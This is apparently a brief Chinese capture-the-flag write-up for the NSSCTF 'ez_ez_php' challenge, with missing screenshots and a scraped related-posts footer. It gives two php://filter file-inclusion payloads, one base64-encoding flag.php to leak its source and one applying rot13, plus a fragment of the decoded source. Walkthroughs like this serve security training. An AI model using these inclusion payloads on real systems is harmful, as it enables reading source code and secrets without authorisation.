NSSCTF ez_ez_php

开启环境:

NSSCTF ez_ez_php_第1张图片

 看到三个等号,用php://filter协议:

?file=php://filter/read=convert.base64-encode/resource=flag.php

NSSCTF ez_ez_php_第2张图片

 得到base64编码的内容,base64解码得:

";
echo "real_flag_is_in_'flag'"."
"; echo "换个思路,试试PHP伪协议呢";

使用php伪协议rot13:

?file=php://filter/write=string.rot13/resource=flag

NSSCTF ez_ez_php_第3张图片

你可能感兴趣的:(php,开发语言)